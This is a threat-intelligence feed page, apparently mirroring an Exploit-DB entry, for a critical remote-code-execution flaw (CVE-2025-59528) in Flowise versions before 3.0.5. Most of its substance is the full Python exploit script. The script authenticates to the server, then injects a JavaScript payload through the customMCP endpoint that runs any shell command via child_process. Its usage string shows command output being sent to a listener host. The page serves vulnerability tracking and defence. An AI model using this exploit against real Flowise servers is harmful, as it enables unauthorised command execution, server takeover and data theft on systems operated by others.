Reconnecting to live updates…
Flowise 3.0.4 - Remote Code Execution (RCE)
Severity: criticalType: exploit
Flowise 3.0.4 - Remote Code Execution (RCE)
Indicators of Compromise
- exploit-code: # Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE) # Date: 10/11/2025 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise # Version: < 3.0.5 # CVE: CVE-2025-59528 from requests import post, session from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ by nltt0 """ try: parser = ArgumentParser(description='CVE-2025-59528 [Flowise < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --password Test@2025 --url http://localhost:3000 --cmd \"http://localhost:1337/`whoami`\"") parser.add_argument('-e', '--email', required=True, help='Registered email') parser.add_argument('-p', '--password', required=True) parser.add_argument('-u', '--url', required=True) parser.add_argument('-c', '--cmd', required=True) args = parser.parse_args() email = args.email password = args.password url = args.url cmd = args.cmd def login(email, url): session = session() url_format = "{}/api/v1/auth/login".format(url) headers = {"x-request-from": "internal", "Accept-Language": "pt-BR,pt;q=0.9", "Accept": "application/json, text/plain, */*", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Origin": "http://workflow.flow.hc", "Referer": "http://workflow.flow.hc/signin", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"} data={"email": email, "password": password} r = session.post(url_format, headers=headers, json=data) return session, r def rce(email, url, password, cmd): session, status_code = login(email, url) url_format = "{}/api/v1/node-load-method/customMCP".format(url) command = f'({{x:(function(){{const cp = process.mainModule.require("child_process");cp.execSync("{cmd}");return 1;}})()}})' data = { "loadMethod": "listActions", "inputs": { "mcpServerConfig": command } } r = session.post(url_format, json=data) if r.status_code == 401: session.headers["x-request-from"] = "internal" session.post(url_format, json=data) print(f"[x] Command executed [{cmd}]") rce(email, url, password, cmd) except Exception as e: print('Error in {}'.format(e))
Flowise 3.0.4 - Remote Code Execution (RCE)
0
CriticalPublished: Fri Oct 31 2025 (10/31/2025, 00:00:00 UTC)
Source: Exploit-DB RSS Feed
Description
Flowise 3.0.4 - Remote Code Execution (RCE)
Technical Details
- Edb Id
- 52440
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit Code
Exploit code for Flowise 3.0.4 - Remote Code Execution (RCE)
# Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE) # Date: 10/11/2025 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise # Version: < 3.0.5 # CVE: CVE-2025-59528 from requests import post, session from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___... (2390 more characters)
Code Length: 2,890 characters
Threat ID: 6904bcc1f54b4a89977a2e93
Added to database: 10/31/2025, 1:42:25 PM
Last updated: 10/31/2025, 5:12:14 PM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Sort by
Loading community insights…
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Windows zero-day actively exploited to spy on European diplomats
CriticalVulnerabilityFri Oct 31 2025
Hackers Exploit WSUS Flaw to Spread Skuld Stealer Despite Microsoft Patch
HighVulnerabilityFri Oct 31 2025
CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks
CriticalVulnerabilityFri Oct 31 2025
Brush exploit can cause any Chromium browser to collapse in 15-60 seconds
HighVulnerabilityThu Oct 30 2025
Can you break our pickle sandbox? Blog + exploit challenge inside
HighVulnerabilityThu Oct 30 2025
Actions
Please log in to the Console to use AI analysis features.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.